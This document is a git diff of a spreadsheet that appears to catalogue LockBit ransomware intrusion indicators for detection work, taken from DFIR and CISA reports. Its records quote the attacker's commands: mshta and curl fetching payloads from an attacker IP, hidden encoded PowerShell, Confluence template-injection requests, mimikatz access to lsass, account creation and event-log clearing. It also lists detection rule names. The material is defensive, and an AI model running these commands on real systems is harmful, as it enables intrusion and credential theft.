--- a/delta2/lib_e/osi_ransom/lockbit.xlsx
+++ b/delta2/lib_e/osi_ransom/lockbit.xlsx
@@ -8,14 +8,18 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A59AA247-2C48-8742-AD15-99ABE34B1166}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B1E5A964-8E11-0E4F-B649-1813E1EA255C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" activeTab="1" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
-    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
+    <sheet name="Sheet2" sheetId="2" r:id="rId1"/>
+    <sheet name="sheet1" sheetId="1" r:id="rId2"/>
   </sheets>
-  <calcPr calcId="181029"/>
+  <calcPr calcId="191029"/>
+  <pivotCaches>
+    <pivotCache cacheId="59" r:id="rId3"/>
+  </pivotCaches>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -36,7 +40,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="637" uniqueCount="341">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="563" uniqueCount="295">
   <si>
     <t>eid</t>
   </si>
@@ -431,69 +435,6 @@
     <t>lockbit-eid0124</t>
   </si>
   <si>
-    <t>lockbit-eid0125</t>
-  </si>
-  <si>
-    <t>lockbit-eid0126</t>
-  </si>
-  <si>
-    <t>lockbit-eid0127</t>
-  </si>
-  <si>
-    <t>lockbit-eid0128</t>
-  </si>
-  <si>
-    <t>lockbit-eid0129</t>
-  </si>
-  <si>
-    <t>lockbit-eid0130</t>
-  </si>
-  <si>
-    <t>lockbit-eid0131</t>
-  </si>
-  <si>
-    <t>lockbit-eid0132</t>
-  </si>
-  <si>
-    <t>lockbit-eid0133</t>
-  </si>
-  <si>
-    <t>lockbit-eid0134</t>
-  </si>
-  <si>
-    <t>lockbit-eid0135</t>
-  </si>
-  <si>
-    <t>lockbit-eid0136</t>
-  </si>
-  <si>
-    <t>lockbit-eid0137</t>
-  </si>
-  <si>
-    <t>lockbit-eid0138</t>
-  </si>
-  <si>
-    <t>lockbit-eid0139</t>
-  </si>
-  <si>
-    <t>lockbit-eid0140</t>
-  </si>
-  <si>
-    <t>lockbit-eid0141</t>
-  </si>
-  <si>
-    <t>lockbit-eid0142</t>
-  </si>
-  <si>
-    <t>lockbit-eid0143</t>
-  </si>
-  <si>
-    <t>lockbit-eid0144</t>
-  </si>
-  <si>
-    <t>lockbit-eid0145</t>
-  </si>
-  <si>
     <t>{"process_command_line": "mshta http://92.51.2.22:443/UsySLX1n.hta",  "process_name": "mshta.exe", "initiating_process_name": "tomcat9.exe"}</t>
   </si>
   <si>
@@ -647,90 +588,9 @@
     <t>etpro</t>
   </si>
   <si>
-    <t>ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1</t>
-  </si>
-  <si>
-    <t>ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers</t>
-  </si>
-  <si>
-    <t>ET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1</t>
-  </si>
-  <si>
-    <t>ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)</t>
-  </si>
-  <si>
-    <t>ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl</t>
-  </si>
-  <si>
-    <t>ET HUNTING PE EXE Download over raw TCP</t>
-  </si>
-  <si>
-    <t>ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1</t>
-  </si>
-  <si>
-    <t>ET INFO Dotted Quad Host HTA Request</t>
-  </si>
-  <si>
-    <t>ET INFO User-Agent (python-requests) Inbound to Webserver</t>
-  </si>
-  <si>
-    <t>ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)</t>
-  </si>
-  <si>
-    <t>ET POLICY Possible HTA Application Download</t>
-  </si>
-  <si>
-    <t>ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199</t>
-  </si>
-  <si>
-    <t>ET WEB_CLIENT PowerShell call in script 1</t>
-  </si>
-  <si>
-    <t>ET WEB_CLIENT PowerShell call in script 2</t>
-  </si>
-  <si>
-    <t>ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request Body</t>
-  </si>
-  <si>
-    <t>ET WEB_SERVER WebShell Generic - net user</t>
-  </si>
-  <si>
-    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1</t>
-  </si>
-  <si>
-    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2</t>
-  </si>
-  <si>
-    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1</t>
-  </si>
-  <si>
-    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2</t>
-  </si>
-  <si>
-    <t>ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1</t>
-  </si>
-  <si>
-    <t>ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)</t>
-  </si>
-  <si>
-    <t>ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard Ports</t>
-  </si>
-  <si>
-    <t>ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP</t>
-  </si>
-  <si>
-    <t>ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2</t>
-  </si>
-  <si>
     <t>sigma</t>
   </si>
   <si>
-    <t>cd951fdc-4b2f-47f5-ba99-a33bf61e3770    :       Always Install Elevated Windows Installer</t>
-  </si>
-  <si>
-    <t>e32d4572-9826-4738-b651-95fa63747e8a    :       Base64 Encoded PowerShell Command Detected</t>
-  </si>
-  <si>
     <t>7d9263bd-dc47-4a58-bc92-5474abab390c    :       Change Winevt Channel Access Permission Via Registry</t>
   </si>
   <si>
@@ -842,18 +702,6 @@
     <t>671bb7e3-a020-4824-a00e-2ee5b55f385e    :       WMI Module Loaded By Uncommon Process</t>
   </si>
   <si>
-    <t>lockbit-eid0146</t>
-  </si>
-  <si>
-    <t>lockbit-eid0147</t>
-  </si>
-  <si>
-    <t>lockbit-eid0148</t>
-  </si>
-  <si>
-    <t>{"date": "2025-02-24" , "url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/", "tags": ["lockbit"]}</t>
-  </si>
-  <si>
     <t>{"date": "2023-11" , "url": "https://www.cisa.gov/sites/default/files/2023-11/aa23-325a_lockbit_3.0_ransomware_affiliates_exploit_cve-2023-4966_citrix_bleed_vulnerability_0.pdf", "tags": ["lockbit"]}</t>
   </si>
   <si>
@@ -986,57 +834,6 @@
     <t>file_name</t>
   </si>
   <si>
-    <t>mshta-pid0001, mshta-pid0002</t>
-  </si>
-  <si>
-    <t>netclt-pid0021</t>
-  </si>
-  <si>
-    <t>whoami-pid0001</t>
-  </si>
-  <si>
-    <t>qusr-pid0001</t>
-  </si>
-  <si>
-    <t>anydesk-pid0001, curl-pid0003</t>
-  </si>
-  <si>
-    <t>mshta-pid0005</t>
-  </si>
-  <si>
-    <t>mshta-pid0001</t>
-  </si>
-  <si>
-    <t>anydesk-pid0001, pshell-pid0003</t>
-  </si>
-  <si>
-    <t>netclt-pid0022</t>
-  </si>
-  <si>
-    <t>netclt-pid0012</t>
-  </si>
-  <si>
-    <t>mimikatz-pid0018</t>
-  </si>
-  <si>
-    <t>rclone-pid0001</t>
-  </si>
-  <si>
-    <t>pdq-pid0001</t>
-  </si>
-  <si>
-    <t>netscan-pid0001</t>
-  </si>
-  <si>
-    <t>netclt-pid0001</t>
-  </si>
-  <si>
-    <t>rclone-pid0004</t>
-  </si>
-  <si>
-    <t>cmd-pid0002</t>
-  </si>
-  <si>
     <t xml:space="preserve">Mistyped </t>
   </si>
   <si>
@@ -1046,19 +843,112 @@
     <t>{"object": "process", "process_command_line": "net group \"domain admins" /domain", "device_type": "domain controller"}</t>
   </si>
   <si>
-    <t>netclit-pid9999</t>
-  </si>
-  <si>
-    <t>psexec-pid0000</t>
-  </si>
-  <si>
-    <t>procdump-pid0000</t>
-  </si>
-  <si>
-    <t>mimikatz-pid00000</t>
-  </si>
-  <si>
-    <t>{"date": "2025-02" , "url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/", "tags": "lockbit"}</t>
+    <t>mshta-pid</t>
+  </si>
+  <si>
+    <t>netclt-pid</t>
+  </si>
+  <si>
+    <t>whoami-pid</t>
+  </si>
+  <si>
+    <t>qusr-pid</t>
+  </si>
+  <si>
+    <t>anydesk-pid, curl-pid</t>
+  </si>
+  <si>
+    <t>anydesk-pid, pshell-pid</t>
+  </si>
+  <si>
+    <t>mimikatz-pid</t>
+  </si>
+  <si>
+    <t>rclone-pid</t>
+  </si>
+  <si>
+    <t>pdq-pid</t>
+  </si>
+  <si>
+    <t>netscan-pid</t>
+  </si>
+  <si>
+    <t>netclit-pid</t>
+  </si>
+  <si>
+    <t>anydesk-pid, pdq-pid</t>
+  </si>
+  <si>
+    <t>anydesk-pid</t>
+  </si>
+  <si>
+    <t>cmd-pid</t>
+  </si>
+  <si>
+    <t>psexec-pid</t>
+  </si>
+  <si>
+    <t>e32d4572-9826-4738-b651-95fa63747e8a : Base64 Encoded PowerShell Command Detected</t>
+  </si>
+  <si>
+    <t>cd951fdc-4b2f-47f5-ba99-a33bf61e3770 : Always Install Elevated Windows Installer</t>
+  </si>
+  <si>
+    <t>ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1
+ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers
+ET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1
+ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
+ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
+ET HUNTING PE EXE Download over raw TCP
+ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1
+ET INFO Dotted Quad Host HTA Request
+ET INFO User-Agent (python-requests) Inbound to Webserver
+ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)
+ET POLICY Possible HTA Application Download
+ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
+ET WEB_CLIENT PowerShell call in script 1
+ET WEB_CLIENT PowerShell call in script 2
+ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request Body
+ET WEB_SERVER WebShell Generic - net user
+ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1
+ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2
+ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1
+ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2
+ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1
+ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)
+ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard Ports
+ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP
+ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2</t>
+  </si>
+  <si>
+    <t>pshell-pid</t>
+  </si>
+  <si>
+    <t>curl-pid</t>
+  </si>
+  <si>
+    <t>procdump-pid</t>
+  </si>
+  <si>
+    <t>lsass-pid</t>
+  </si>
+  <si>
+    <t>teamvwr-pid</t>
+  </si>
+  <si>
+    <t>Row Labels</t>
+  </si>
+  <si>
+    <t>Grand Total</t>
+  </si>
+  <si>
+    <t>Count of map_pid</t>
+  </si>
+  <si>
+    <t>Count of eid_type</t>
+  </si>
+  <si>
+    <t>{"date": "2025-02" , "url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/", "tags": ["lockbit"]}</t>
   </si>
 </sst>
 </file>
@@ -1100,7 +990,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="3">
+  <cellXfs count="6">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
@@ -1108,6 +998,11 @@
     <xf numFmtId="11" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1147,11 +1042,1106 @@
 </styleSheet>
 </file>
 
+<file path=xl/pivotCache/pivotCacheDefinition1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotCacheDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" r:id="rId1" refreshedBy="Harvey Wargo" refreshedDate="45770.329533217591" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="124" xr:uid="{0610AF1D-840C-3042-A821-D069726C567D}">
+  <cacheSource type="worksheet">
+    <worksheetSource name="Table1"/>
+  </cacheSource>
+  <cacheFields count="6">
+    <cacheField name="eid" numFmtId="0">
+      <sharedItems/>
+    </cacheField>
+    <cacheField name="map_pid" numFmtId="0">
+      <sharedItems containsBlank="1"/>
+    </cacheField>
+    <cacheField name="eid_type" numFmtId="0">
+      <sharedItems/>
+    </cacheField>
+    <cacheField name="evidence" numFmtId="0">
+      <sharedItems longText="1"/>
+    </cacheField>
+    <cacheField name="description" numFmtId="0">
+      <sharedItems containsBlank="1"/>
+    </cacheField>
+    <cacheField name="ns_meta" numFmtId="0">
+      <sharedItems count="4">
+        <s v="{&quot;date&quot;: &quot;2025-02&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}"/>
+        <s v="{&quot;date&quot;: &quot;2023-11&quot; , &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2023-11/aa23-325a_lockbit_3.0_ransomware_affiliates_exploit_cve-2023-4966_citrix_bleed_vulnerability_0.pdf&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}"/>
+        <s v="{&quot;date&quot;: &quot;2025-02-24&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}" u="1"/>
+        <s v="{&quot;date&quot;: &quot;2025-02&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: &quot;lockbit&quot;}" u="1"/>
+      </sharedItems>
+    </cacheField>
+  </cacheFields>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{725AE2AE-9491-48be-B2B4-4EB974FC3084}">
+      <x14:pivotCacheDefinition/>
+    </ext>
+  </extLst>
+</pivotCacheDefinition>
+</file>
+
+<file path=xl/pivotCache/pivotCacheRecords1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotCacheRecords xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" count="124">
+  <r>
+    <s v="lockbit-eid0001"/>
+    <s v="mshta-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;mshta http://92.51.2.22:443/UsySLX1n.hta&quot;,  &quot;process_name&quot;: &quot;mshta.exe&quot;, &quot;initiating_process_name&quot;: &quot;tomcat9.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0002"/>
+    <s v="mshta-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;mshta http://92.51.2.22:443/TNillGnQ.hta&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0003"/>
+    <s v="netclt-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;net user&quot;, &quot;initiating_process_file_name&quot;: &quot;tomcat9.exe&quot;, &quot;account_name&quot;: &quot;NETWORK SERVICE&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0004"/>
+    <s v="whoami-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;whoami&quot;, &quot;initiating_process_file_name&quot;: &quot;tomcat9.exe&quot;, &quot;account_name&quot;: &quot;NETWORK SERVICE&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0005"/>
+    <s v="qusr-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;query user&quot;, &quot;initiating_process_file_name&quot;: &quot;tomcat9.exe&quot;, &quot;account_name&quot;: &quot;NETWORK SERVICE&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0006"/>
+    <s v="anydesk-pid, curl-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;curl http://92.51.2.22:8088/AnyDesk.msi -OutFile AnyDesk.msi&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0007"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0008"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;, &quot;http_content&quot;: &quot;write((new freemarker.temlate.utility.Execute()).exec({\&quot;whoami\&quot;}))&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0009"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;, &quot;http_content&quot;: &quot;write((new freemarker.temlate.utility.Execute()).exec({\&quot;net user\&quot;}))&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0010"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;, &quot;http_content&quot;: &quot;write((new freemarker.temlate.utility.Execute()).exec({\&quot;query user\&quot;}))&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0011"/>
+    <s v="mshta-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e &lt;encoded string&gt;&quot;,  &quot;process_name&quot;: &quot;powershell.exe&quot;, &quot;initiating_process_name&quot;: &quot;mshta.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0012"/>
+    <s v="mshta-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_name&quot;: &quot;C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\IE\UsySLX1n[1].hta&quot;, &quot;initiating_file_name&quot;: &quot;mshta.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0013"/>
+    <s v="anydesk-pid, pshell-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0014"/>
+    <s v="netclt-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;net user &lt;accountname&gt; &lt;password&gt; /add&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0015"/>
+    <s v="netclt-pid"/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;net localgroup &lt;accountname&gt;  /add&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0016"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimidrv.sys&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0017"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimikatz.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0018"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimilib.dll&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0019"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimilove.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0020"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimispool.dll&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0021"/>
+    <s v="rclone-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\rclone\rclone.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0022"/>
+    <s v="pdq-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\pdq.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0023"/>
+    <s v="netscan-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\scanner\netscan.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0024"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;wevutil el&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0025"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;wevutil cl &lt;log name&gt;&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0026"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;process_access&quot;, &quot;initiating_process_file_name&quot;: &quot;mimikatz.exe&quot;, &quot;file_name&quot;: &quot;lsass.exe&quot;, &quot;access_grant&quot;: &quot;0x1010&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0027"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;powershell -f  Veeam-Get-Creds-New.ps1&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0028"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\passwords.txt&quot;, &quot;initiating_file_name&quot;: &quot;mimikatz.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0029"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;taskkill /f&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0030"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;taskkill /im&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0031"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;tasklist&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0032"/>
+    <s v="netclit-pid"/>
+    <s v="object"/>
+    <s v="{&quot;object&quot;: &quot;process&quot;, &quot;process_command_line&quot;: &quot;net group \&quot;domain admins\&quot; .domain&quot;, &quot;device_type&quot;: &quot;domain controller&quot;}"/>
+    <s v="Mistyped "/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0033"/>
+    <s v="netclt-pid"/>
+    <s v="object"/>
+    <s v="{&quot;object&quot;: &quot;process&quot;, &quot;process_command_line&quot;: &quot;net group \&quot;domain admins&quot; /domain&quot;, &quot;device_type&quot;: &quot;domain controller&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0034"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;process_command_line&quot;: &quot;query user&quot;, &quot;device_type&quot;: &quot;domain controller&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0035"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_name&quot;: &quot;delete.me&quot;}"/>
+    <s v="When NetScan is Executed with 'Check for write access' option enabled 'delete.me' file is created then deleted"/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0036"/>
+    <s v="netscan-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;netscan.exe&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0037"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;netscan.lic&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0038"/>
+    <m/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;netscan.xml&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0039"/>
+    <s v="mimikatz-pid"/>
+    <s v="object"/>
+    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimidrv.sys&quot;}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="lockbit-eid0040"/>
